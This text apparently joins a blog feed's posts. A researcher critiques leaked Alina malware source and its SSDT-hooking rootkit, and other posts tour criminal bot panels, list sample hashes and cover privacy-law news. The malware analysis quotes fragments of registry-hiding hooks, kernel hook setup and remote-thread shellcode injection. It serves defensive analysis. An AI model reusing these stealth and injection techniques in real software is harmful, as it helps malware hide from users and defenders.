Josh Grunzweig did already an interesting coverage of a sample, but what worth this new version ?

InjectedDLL.c from the source is a Chinese copy-paste of http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks :D
a comment is still in Chinese as you can see on the screenshot.

+ this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
{
Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
}
return Result;
}

...

// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code, no sanity checks in hooks, nothing stable.
Haven't looked at a sample in the wild but i doubt it work anyhow.
Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking.
Driver is ridiculously simple:
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
  BuildMdlForSSDT();
  InitStrings();
  SetHooks();
  return STATUS_SUCCESS;
}

BOOL SetHooks()
{
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;
}

All of them hide 'windefender' target process, file, registry.
void InitStrings()
{
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
It's the malware name, Josh pointed also in this direction on his analysis.
First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago )
https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/

Overall that dll seems unusued, alina project uses driver i mentioned.
As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile:
source\grab\base.cpp(78)
If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.

Two copy-pasted methods with same mistake:
source\grab\base.cpp(298)
source\grab\base.cpp(433)
Leaking process information handle pi.hProcess.

Using hKey from failed function call:
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
      RegCloseKey(hKey);

pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread:
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

Where hwid declared as char hwid[8];
Reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read:
source\grab\panelrequest.cpp(73):
memcpy(outkey, hdr->hwid, 18);

Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:
source\grab\panelrequest.cpp(173)

The prior call to strncpy might not zero-terminate string Result:
source\grab\scanner.cpp(159)

Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized:
source\grab\watcher.cpp(61)
source\grab\watcher.cpp(64)
source\grab\watcher.cpp(71)

Signed unsigned mismatch:
source\grab\rootkitinstaller.cpp(47)

Unreferenced local variable hResult:
source\grab\base.cpp(158)

Using TerminateThread does not allow proper thread clean up:
source\grab\watcher.cpp(125)

Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot.
In any case that can count as a code addition or something 'new'
For the panel... well it's like the bot, nothing changed at all.
It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on...

To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it.
Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety.
This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements.

Hi Benson.

President Obama Announces a National Data Breach Notification Standard and Other Cybersecurity Legislative Proposals and Efforts

On January 13, 2015, President Obama announced legislative proposals and administration efforts with respect to cybersecurity, including a specific proposal for a national data breach notification standard. Aside from the national data breach notification standard, the President’s other proposals are designed to (1) encourage the private sector to increase the sharing of information related to cyber threats with the federal government and (2) modernize law enforcement to effectively prosecute illegal conduct related to cybersecurity.

The proposed national data breach notification standard is largely preemptive of state data breach notification laws and would require businesses to notify affected individuals if their sensitive personally identifiable information (“SPII”) is subject to a “security breach.” Key aspects of the proposal are uniformly onerous from a business perspective. For example:

  • The definition of SPII is broadly construed and differs from corresponding definitions of personal information under state data breach notification statutes.
  • Businesses would have thirty days to notify affected individuals of a security breach, with limited exceptions. Businesses would not need to notify affected individuals if “there is no reasonable risk of harm or fraud” to the affected individuals. This high threshold, combined with the need to conduct a risk assessment and report the results to the FTC in order to rely on it, creates a more onerous standard than the majority of state laws with respect to consumer harm.
  • Businesses are required to notify individuals directly and provide media notification in any state with more than 5,000 affected individuals.
  • Businesses must notify “an entity designated by the Department of Homeland Security” within 10 days of discovering the breach.

In addition to breach notification, President Obama’s proposal encourages the private sector to share “appropriate cyber threat information with the Department of Homeland Security’s National Cybersecurity and Communications Integration Center” (“NCCIC”). According to the announcement, the NCCIC will then share the cyber threat information with (1) appropriate federal agencies and (2) Information Sharing and Analysis Organizations (“ISAOs”), which are developed and operated by the private sector. To encourage sharing with ISAOs, the Obama Administration’s proposal grants “targeted liability protection” to companies that share the cyber threat information they acquire.

A third proposal seeks to modernize law enforcement to effectively combat illegal activities relating to cybersecurity. For example, according to the announcement, the proposal “would allow for the prosecution of the sale of botnets, would criminalize the overseas sale of stolen U.S. financial information like credit card and bank account numbers, would expand federal law enforcement authority to deter the sale of spyware used to stalk or commit ID theft, and would give the courts the authority to shut down botnets engaged in distributed denial of service attacks and other criminal activity.”

Tiberium/Consuella USPS money laundering service


Consuella was a 'USPS drop service' run by one of the Lampeduza administrator.
This type of service is used to help credit card thieves to "cash out" by sending carded labels service overseas (or not) via USPS.
They was also constantly recruiting mules in United states to keep addresses in rotation.


Here is what look like the service from an admin point of view:


Add a payement:

Users:
Supports:

News:

Settings:

Although Consuella was incredibly simple compared to others drop-shipping service such as addtrack.biz and pac-man.co who had fake website for mules on the panel.

FTC Chair Calls for Security by Design, Data Minimization and Notice and Choice for Unexpected Uses in Remarks on the Internet of Things at the 2015 International Consumer Electronics Show

On January 6, 2015, Federal Trade Commission Chairwoman Edith Ramirez gave the opening remarks on “Privacy and the IoT: Navigating Policy Issues” at the 2015 International Consumer Electronics Show (“International CES”) in Las Vegas, Nevada. She addressed the key challenges the Internet of Things (“IoT”) poses to consumer privacy and how companies can find appropriate solutions that build consumer trust.

Chairwoman Ramirez acknowledged that the IoT “has the potential to provide enormous benefits for consumers, but it also has significant privacy and security implications.” She offered “three key challenges…the IoT poses to consumer privacy: (1) ubiquitous data collection; (2) the potential for unexpected uses of consumer data that could have adverse consequences; and (3) heightened security risks.”

The first challenge from the IoT, ubiquitous data collection, arises from the “digital trail” consumers leave behind as more technology is introduced into intimate spaces and sensitive data is collected. Companies monitor and analyze this data and can “make additional sensitive inferences and compile even more detailed profiles of consumer behavior.” The second challenge of “unexpected uses,” raises the question of whether these uses are “inconsistent with consumers’ expectations or relationship with a company.” According to Chairwoman Ramirez, the risks may include that the collected information may “paint a picture” of the consumer that the consumer “will not see but that others will,” including others that might make decisions about the consumer. Finally, Ramirez highlighted the heightened security risk associated with IoT devices, as the small size, limited processing power, and often low-cost and disposable nature of such devices may inhibit appropriate protections.

In the second half of her speech, Chairwoman Ramirez addressed three things companies can do to address these challenges. The first is to prioritize security and incorporate security into the device design process. Second, companies should “follow the principle of data minimization,” and only collect data needed for a specific purpose and destroy the data after it has served its purpose. She acknowledged that limits on data collection can hinder a company’s access to potentially valuable information, but she questioned whether “we must put sensitive consumer data at risk” to reap unknown benefits in the future. According to Ramirez, “reasonable limits on data collection and retention are a necessary first line of protection for consumers.” Finally, while recognizing the risk of burdening consumers with too much information and too many choices, she noted that companies should nevertheless find ways to provide consumers “clear and simple notice” of how their data is being collected and used.

Chairwoman Ramirez concluded by emphasizing the importance of a balanced approach to the IoT that allows it to continue to evolve and flourish while also protecting consumer privacy.

The International CES is a major global consumer electronics and consumer technology tradeshow hosted by the Consumer Electronics Association, a technology trade association representing the U.S. consumer electronics industry.

Safeway Reaches Settlement with California District Attorneys Over Allegations of Unlawful Disposal of Medical Records

On January 5, 2015, the Alameda County District Attorney’s Office announced that Safeway Inc. (“Safeway”) has agreed to pay $9.87 million to settle claims that the company unlawfully disposed of customer medical information and hazardous waste in violation of California’s Confidentiality of Medical Information Act and Hazardous Waste Control Law. In a series of waste inspections from 2012 to 2013, a group of California district attorneys and environmental regulators found that Safeway was disposing of both its pharmacy customers’ confidential information and various types of hazardous wastes in the company’s dumpsters. Based on the investigation, 42 California district attorneys and two city attorneys brought a complaint on December 31, 2014, alleging, among other things, that more than 500 Safeway stores and distribution centers engaged in the disposal of their customers’ medical information in a manner that did not preserve the confidentiality of the information.

The settlement calls for Safeway to pay (1) a $6.72 million civil penalty, (2) $2 million for supplemental environmental projects and (3) $1.15 million in attorneys’ fees and costs. In addition, pursuant to the agreement, Safeway must maintain and enhance, as necessary, its customer record disposal program to ensure that customer medical information is disposed of in a manner that preserves the customer’s privacy.

Phase (Win32/PhaseBot-A)

Small write-up about 'Phase' a malware who appeared and vanished very rapidly.
I had a look on it with MalwareTech who wrote several stories, it was shown that Phase is in reality a 'new' version of Solar bot, at least not so new, the code is so copy/pasted that even Antivirus such as Avast do false positives and now detect Napolar (Solar) as PhaseBot.

Advert:

Phase support website:

The coder is using public snippet for chatting with customers:
So weak that this is even vulnerable to xss.

Master balance ? less than < 1k
Phase seem not so popular, and got also rapidly lynched by other actors on forums.

Anyway let's have a look on the web panel.
Login:

Dashboard:

Commands:

Botlist:

Credentials:

Socks5:

Browsers:

Modules:

Analyzer detector:

RDP:

Settings:

FAQ:

Structure:

In the wild panel, having Ram scrapper plugin + VNC:

Ram scrapper plugin:

Point-of-sale remote controlled:

Another botnet with hacked point of sale remote controlled:

Wallet stealer:

Phase samples:
ae7a56b3adf6f7684ba14a77c017904d
12dccdec47928e5298055996415a94f2
d1446326bf1c69ea9df6e65bd472f358
1f3e808a3ccd981f3e61de227dae93b8
6ce0bb4cd86295f915160d7207a07a47
5767b9bf9cb6f2b5259f29dd8b873e36
a10f84153dba7b73980f0ff50d8cc8e6
f8ffcab3324561598ce5c375c07066be
e4574fbc1014d27e1b6906bfc5351e0e
d2ed20b1996e7e5bad2b91fd255732ef
f89b4e626c7a81544ca7395be3262cf6
ef69575e14fa965380242db26675d2df
fc586c3ec37e51668e905d0acfc913f6
eb9b56d829c3951b6e9cb5e4a651f7c8
6f53d3cd1acb7541bcc7399c4af001b1
19fa3927577571c51428f6eee2b5f52f
4ec84f1aa91e4cdc12118002244ca582
20e3a9ec396ad8b57a36ea3c6b9f151a
fe5dfa53204a65eca741ceab352c3b00
ace0a059dc2264c847d4e6c91f829dfd
f01c1ea73e968c2309391dcf3f0a2848

Unencrypted Ram scrapper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (With a small trendMicro signature fail "PHP_SORAYA.A" no this is not the Soraya panel.
Needless to say the panel was also vulnerable.

iBanking

iBanking is an android malware made to intercept voice and text informations.
The panel is poorly coded.

Login:

Projects:

Phone list:

SMS List:

All SMS (Incomming)

All SMS (Outgoing):

Call list (Incomming):

Call list (Outgoing):

Call list (Missed):

Sounds:

Contact list:

Url report:

President Obama Announces Initiatives on Data Security and Student Privacy

On January 12, 2015, President Obama announced at the Federal Trade Commission several new initiatives on data security and consumer privacy as part of a weeklong focus on privacy and cybersecurity. He noted that on January 13 at the Department of Homeland Security, he would address how to improve protections against cyber attacks, and on January 14, he would address how more Americans can have access to faster and cheaper broadband Internet. He stated that the announcements he is making this week are “sneak previews” of the proposals he will make in next week’s State of the Union address.

Acknowledging the tremendous benefits and opportunities associated with the digital economy, President Obama noted that “we shouldn’t have to forfeit our basic privacy when we go online to conduct business.” Specifically, the President proposed the following four measures to protect consumers’ data security and privacy:

  • Data breach notification legislation. The President will introduce legislation for a single, strong national breach notification standard that will require companies to notify their customers within 30 days of a data breach. This legislation also will close “loopholes” to enable action against criminals who are overseas.
  • Improved access to credit scores. There will be enhanced and free access to a credit score early warning system that will notify consumers of fraudulent activities on their financial accounts.
  • Comprehensive privacy legislation. By the end of February, the President will introduce the Consumer Privacy Bill of Rights, a comprehensive privacy law that includes basic principles on what data may be collected and how it may be used. President Obama noted that consumers have the right to know that when information is collected for one purpose, it will not subsequently be used for a different purpose.
  • Student privacy legislation. The President will introduce the Student Digital Privacy Act, which will ensure that data collected “in the classroom” will be used only for educational purposes and not for commercial purposes, such as targeted advertising or student profiling. The proposed law will permit research to improve educational outcomes and tools.

Noting that privacy and data security should not be partisan issues, President Obama expressed optimism in the success of these initiatives. According to the President “business leaders want their privacy and their children’s privacy protected just like everybody else does. Consumer and privacy advocates also want to make sure that America keeps leading the world in technology and innovation and apps.”

Irish Government Files Amicus Brief in Microsoft Case

In December 2014, we reported that various technology companies, academics and trade associations filed amicus briefs in support of Microsoft’s attempts to resist a U.S. government search warrant seeking to compel it to disclose the contents of customer emails that are stored on servers in Ireland. On December 23, 2014, the Irish government also filed an amicus brief in the 2nd Circuit Court of Appeals.

The amicus brief filed by the Irish government notes the servers are located in Ireland and stresses the importance of Irish sovereignty. The Irish government argues that the appropriate mechanism for obtaining data held on servers in Ireland is through international cooperation and the use of existing international treaties that were entered into for the specific purpose of enabling a government to request information that is subject to the laws of a foreign country.

The Irish government also noted a previous case where the Supreme Court of Ireland held that an Irish court can compel the disclosure of information stored by an Irish entity outside of Ireland if the information is for a criminal or similar investigation and there are no alternative means of obtaining the information. It is unclear, however, to what extent the U.S. court will consider a decision issued by a foreign court, such as the Supreme Court of Ireland.

Echoing its previous appeal to the U.S. government to “find a better way forward,” Microsoft welcomed the Irish government’s brief and reiterated its view that an international dialogue is the best way to resolve the issue of cross-border disclosure requests.

French Data Protection Authority Issues New Decision on Monitoring and Recording Telephone Calls in the Workplace

In a decision published on January 6, 2015, the French data protection authority (the “CNIL”) adopted a new Simplified Norm NS 47 (the “Simplified Norm”) that addresses the processing of personal data in connection with monitoring and recording employee telephone calls in the workplace. Data processing operations in compliance with all of the requirements set forth in the Simplified Norm may be registered with the CNIL through a simplified registration procedure. If the processing does not comply with the Simplified Norm, however, a standard registration form must be filed with the CNIL. The Simplified Norm includes the following requirements:

Scope of the Simplified Norm

Only data processing operations that involve monitoring and recording employee telephone calls on a periodic basis are within the scope of the Simplified Norm. If employee telephone calls are recorded on a permanent or systematic basis, the data processing may not benefit from the simplified registration procedure. Further, the monitoring and recording of telephone calls may not be implemented by any public or private organization whose tasks consist of collecting sensitive personal data. Audiovisual recordings also are excluded from the scope of the Simplified Norm.

Purposes of the Data Processing

In order to benefit from the Simplified Norm, organizations may only listen to and record employee telephone calls for one or more of the following purposes: employee training, employee performance and improvement in the quality of the service.

The other requirements of the Simplified Norm relate to the types of personal data collected and processed, the recipients of the data, the data retention periods, the information to be provided to employees and call participants, the security measures to be implemented, and the rules to be observed in case of data transfers outside of the European Union. This Simplified Norm will help reduce the formalities linked to the registration process with the CNIL and serve as useful guidance for companies wishing to monitor or record their employees’ telephone calls.

Video archives of security conferences and workshops


Just some links for your enjoyment

List of security conferences in 2014

Video archives:




AIDE (Appalachian Institute of Digital Evidence)


Blackhat
Botconf
Bsides
Chaos Communication Congress
Defcon
Derbycon
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
InfowarCon
Ruxcon
Shmoocon
ShowMeCon
SkyDogCon
TakeDownCon
Troopers
Heidelberg Germany
Workshops, How-tos, and Demos

Special thanks to  Adrian Crenshaw for his collection of videos

Deadline for Compliance with Russian Localization Law Set for September 1, 2015

On December 31, 2014, Russian President Vladimir Putin signed legislation to move the deadline for compliance to September 1, 2015, for Federal Law No. 242-FZ (the “Localization Law”), which requires companies to store the personal data of Russian citizens in databases located in Russia. The bill that became the Localization Law was adopted by the lower chamber of Russian Parliament in July 2014 with a compliance deadline of September 1, 2016. The compliance deadline was then moved to January 1, 2015, before being changed to September 1, 2015 in the legislation signed by President Putin.

The Russian law firm ALRUD reports that the Localization Law creates a new obligation to store personal data of Russian citizens in Russia, meaning that companies located outside Russia “will be forced to place their servers within Russia if they plan to continue making business in the market.” The exact purview of the Localization Law is somewhat ambiguous, but the law requires data operators to ensure that the recording, systemization, accumulation, storage, revision (updating and amending), and extraction of personal data of Russian citizens occur in databases located in Russia. As an example of the ambiguity regarding the scope of the Localization Law, it is unclear whether the law applies to companies that collect personal data from Russian customers but have no physical presence in Russia. In addition, it is unclear whether the law will affect the cross-border transfers of personal data from Russia to foreign jurisdictions.

Hong Kong Privacy Commissioner Publishes Guidance on Cross-Border Data Transfers

On December 29, 2014, the Hong Kong Office of the Privacy Commissioner for Personal Data published guidance (the “Guidance Note”) on the protection of personal data in cross-border data transfers. The Guidance Note was released in light of the Privacy Commissioner’s intention to elaborate on the legal restrictions governing cross-border data transfers in Hong Kong, though these have not yet gone into effect.

Although the Hong Kong Personal Data (Privacy) Ordinance (the “Ordinance”) contains a provision (“Section 33”) imposing restrictions on cross-border data transfers, this provision did not go into effect when the rest of the Ordinance was enacted in 1995. Consequently, there currently is no effective legal restriction on cross-border data transfers in Hong Kong. As such, the new Guidance Note published by the Privacy Commissioner is voluntary and not binding. The Privacy Commissioner intends for the Guidance Note to be a practical guide that helps data users prepare for the cross-border data transfer restrictions of Section 33. The Privacy Commissioner noted, however, that no firm date has been set for Section 33 to go into operation.

Notably, the Guidance Note provides recommended model contractual clauses for cross-border data transfers of personal data outside of Hong Kong. The Privacy Commissioner’s Office does not require that the recommended model clauses be used verbatim. Instead, the Guidance Note advises the parties to make revisions or additions according to their own commercial needs.